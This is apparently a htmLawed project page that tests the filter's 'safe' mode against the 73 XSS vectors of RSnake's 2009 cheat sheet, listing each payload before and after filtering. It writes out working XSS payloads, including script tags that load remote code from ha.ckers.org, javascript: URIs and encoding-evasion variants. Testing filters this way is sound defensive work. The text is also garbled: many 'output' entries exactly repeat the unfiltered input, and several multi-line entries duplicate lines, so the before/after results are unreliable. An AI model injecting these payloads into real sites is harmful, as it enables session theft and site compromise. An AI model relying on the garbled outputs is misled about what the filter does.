PHP Labware internal utilities / htmLawed
HTMLAWED 1.1 safe mode against RSnake XSS VECTORS
To illustrate the anti-XSS'ing efficiency of htmLawed in 'safe' mode, htmLawed was used to filter text for each of the XSS vector (code) listed on RSnake's XSS cheat sheet (31 January 2009; an updated version may be available ).For each vector, the code is shown for both before and after the filtering. Most vectors obviously designed to exploit HTML markup in the <head> section or in <frame>, <noframe>, or <frameset> elements of web-pages, or those targeting non-HTML content such as Flash movies, PHP interpreters, etc., were not considered as those are outside htmLawed's purview. How htmLawed neutralizes text (e.g., '>' can be removed or converted to an HTML entity) can vary depending on the settings used.
The 'safe' mode means that the $config parameter 'safe' is set to 1, and other parameters to over-ride any of the default parameter values implicitly used because of 'safe' are not specified.
In such cases,
'safe'=>1 is thus equivalent to the following in a $config value:'comments'=>0,
'cdata'=>0, 'deny_attribute'=>'on*',
elements'=>'* -applet -audio -canvas -embed -iframe -object -script -video',
'schemes'=>'href: aim, feed, file, ftp, gopher, http, https, irc, mailto, news, nntp, sftp, ssh, tel, telnet; style: !; *:file, http, https'
Refer to htmLawed documentation for more about $config.
Note: Security concerns when filtering HTML are defined by many parameters, like trust in a user, or an admin.'s requirement. htmLawed is an HTML filter/processor, and not an anti-XSS tool per se. For instance, just the presence of Javascript code or dynamic CSS expressions in HTML does not mean that the HTML is dangerous. htmLawed certainly can be used with the right settings to remove such HTML code as is shown in the examples below. On this site you can also find more test-cases with XSS or bad HTML code, as well as an htmLawed demo page.
There is also a demo page to test just the anti-XSS ability of htmLawed (in safe mode, with style attribute denied).
1. XSS Locator
About »
Input code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2. XSS Quick Test
About »
Input code »
'';!--"<XSS>=&{()}
Output code »
'';!--"<XSS>=&{()}
3. SCRIPT w/Alert()
About »
Input code »
<SCRIPT>alert('XSS')</SCRIPT>
Output code »
<SCRIPT>alert('XSS')</SCRIPT>
4. SCRIPT w/Source File
About »
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Output code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
5. SCRIPT w/Char Code
About »
Input code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
6. DIV background-image 1
About »
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
7. DIV background-image 2
About »
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
8. DIV expression
About »
Input code »
<DIV STYLE="width: expression(alert('XSS'));">
Output code »
<div style="width: (alert('XSS'));"></div>
9. IFRAME
About »
Input code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Output code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
10. INPUT Image
About »
Input code »
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Output code »
<input type="image" src="denied:javascript:alert('XSS');" />
11. IMG w/JavaScript Directive
About »
Input code »
<IMG SRC="javascript:alert('XSS');">
Output code »
<img src="denied:javascript:alert('XSS');" alt="image" />
12. IMG No Quotes/Semicolon
About »
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="denied:javascript:alert(" alt="image" />
13. IMG Dynsrc
About »
Input code »
<IMG DYNSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
14. IMG Lowsrc
About »
Input code »
<IMG LOWSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
15. IMG Embedded commands 1
About »
Input code »
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Output code »
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
16. IMG Embedded commands 2
About »
Input code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Output code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
17. IMG STYLE w/expression
About »
Input code »
exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
Output code »
exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
18. IMG w/VBscript
About »
Input code »
<IMG SRC='vbscript:msgbox("XSS")'>
Output code »
<img src="denied:vbscript:msgbox("XSS")" alt="image" />
19. LAYER
About »
Input code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Output code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
20. Livescript
About »
Input code »
<IMG SRC="livescript:[code]">
Output code »
<img src="denied:livescript:[code]" alt="image" />
*21. US-ASCII encoding
About »
Input code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Output code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
22. Mocha
About »
Input code »
<IMG SRC="mocha:[code]">
Output code »
<img src="denied:mocha:[code]" alt="image" />
23. OBJECT
About »
Input code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Output code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
24. OBJECT w/Embedded XSS
About »
Input code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
Output code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
25. Embed Flash
About »
Input code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Output code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
*26. OBJECT w/Flash 2
About »
Input code »
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";¬
eval(a+b+c+d);
eval(a+b+c+d);
Output code »
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";¬
eval(a+b+c+d);
eval(a+b+c+d);
27. STYLE
About »
Input code »
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Output code »
<style type="text/javascript" scoped="scoped">alert('XSS');</style>
28. STYLE w/Comment
About »
Input code »
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Output code »
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
29. STYLE w/Anonymous HTML
About »
Input code »
<XSS STYLE="xss:expression(alert('XSS'))">
Output code »
<XSS STYLE="xss:expression(alert('XSS'))">
30. TABLE
About »
Input code »
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
Output code »
<table></table>
31. TD
About »
Input code »
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
Output code »
<table><td></td></table>
32. XML namespace
About »
Input code »
<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
Output code »
<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
33. XML data island w/CDATA
About »
Input code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
Output code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><span></span>
</C></X></xml><span></span>
34. XML data island w/comment
About »
Input code »
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>¬
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Output code »
<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>¬
<span></span>
<span></span>
35. XML (locally hosted)
About »
Input code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Output code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<span></span>
<span></span>
36. XML HTML+TIME
About »
Input code »
<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
Output code »
<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
37. Commented-out Block
About »
Input code »
<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
Output code »
<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
38. Rename .js to .jpg
About »
Input code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Output code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
39. SSI
About »
Input code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Output code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
40. PHP
About »
Input code »
<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>
echo('IPT>alert("XSS")</SCRIPT>'); ?>
Output code »
<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>
echo('IPT>alert("XSS")</SCRIPT>'); ?>
41. JavaScript Includes
About »
Input code »
<BR SIZE="&{alert('XSS')}">
Output code »
<br />
42. Case Insensitive
About »
Input code »
<IMG SRC=JaVaScRiPt:alert('XSS')>
Output code »
<img src="denied:JaVaScRiPt:alert(" alt="image" />
43. HTML Entities
About »
Input code »
<IMG SRC=javascript:alert("XSS")>
Output code »
<img src="denied:javascript:alert("XSS")" alt="image" />
44. Grave Accents
About »
Input code »
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Output code »
<img src="denied:`javascript:alert(" alt="image" />
45. Image w/CharCode
About »
Input code »
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Output code »
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
46. UTF-8 Unicode Encoding
About »
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="denied:javascript:alert('XSS')"
alt="image" />
47. Long UTF-8 Unicode w/out Semicolons
About »
Input code »
<IMG
SRC=javascript:alert('XSS')>
Output code »
<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"
alt="image" />
48. DIV w/Unicode
About »
Input code »
<DIV
STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Output code »
<div
style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072
069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029'
029"></div>
49. Hex Encoding w/out Semicolons
About »
Input code »
<IMG
SRC=javascript:alert('XSS')>
Output code »
<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29"
alt="image" />
50. Embedded Tab
About »
Input code »
<IMG SRC="jav ascript:alert('XSS');">
Output code »
<img src="denied:jav ascript:alert('XSS');" alt="image" />
51. Embedded Encoded Tab
About »
Input code »
<IMG SRC="jav	ascript:alert('XSS');">
Output code »
<img src="denied:jav	ascript:alert('XSS');" alt="image" />
52. Embedded Newline
About »
Input code »
<IMG SRC="jav
ascript:alert('XSS');">
Output code »
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
53. Embedded Carriage Return
About »
Input code »
<IMG SRC="jav
ascript:alert('XSS');">
Output code »
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
54. Multiline w/Carriage Returns
About »
Input code »
<IMG¬
SRC¬
=¬
"¬
j¬
a¬
v¬
a¬
s¬
c¬
r¬
i¬
p¬
t¬
:¬
a¬
l¬
e¬
r¬
t¬
(¬
'¬
X¬
S¬
S¬
'¬
)¬
"¬
>
SRC¬
=¬
"¬
j¬
a¬
v¬
a¬
s¬
c¬
r¬
i¬
p¬
t¬
:¬
a¬
l¬
e¬
r¬
t¬
(¬
'¬
X¬
S¬
S¬
'¬
)¬
"¬
>
Output code »
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
55. Spaces/Meta Chars
About »
Input code »
<IMG SRC="  javascript:alert('XSS');">
Output code »
<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
56. Non-Alpha/Non-Digit
About »
Input code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
57. Non-Alpha/Non-Digit Part 2
About »
Input code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Output code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
58. No Closing Script Tag
About »
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js
Output code »
<SCRIPT SRC=http://ha.ckers.org/xss.js
59. Protocol resolution in script tags
About »
Input code »
<SCRIPT SRC=//ha.ckers.org/.j>
Output code »
<SCRIPT SRC=//ha.ckers.org/.j>
60. Half-Open HTML/JavaScript
About »
Input code »
<IMG SRC="javascript:alert('XSS')"
Output code »
<IMG SRC="javascript:alert('XSS')"
61. Double open angle brackets
About »
Input code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Output code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
62. Extraneous Open Brackets
About »
Input code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
Output code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
63. Malformed IMG Tags
About »
Input code »
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Output code »
<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
64. No Quotes/Semicolons
About »
Input code »
<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>
alert(a.source)</SCRIPT>
Output code »
<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>
alert(a.source)</SCRIPT>
65. Evade Regex Filter 1
About »
Input code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
66. Evade Regex Filter 2
About »
Input code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
67. Evade Regex Filter 3
About »
Input code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
68. Evade Regex Filter 4
About »
Input code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
69. Evade Regex Filter 5
About »
Input code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
70. Filter Evasion 1
About »
Input code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
71. Filter Evasion 2
About »
Input code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
72. Mixed Encoding
About »
Input code »
<A HREF="h¬
tt p://6	6.000146.0x7.147/">XSS</A>
tt p://6	6.000146.0x7.147/">XSS</A>
Output code »
<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
73. JavaScript Link Location
About »
Input code »
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Output code »
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>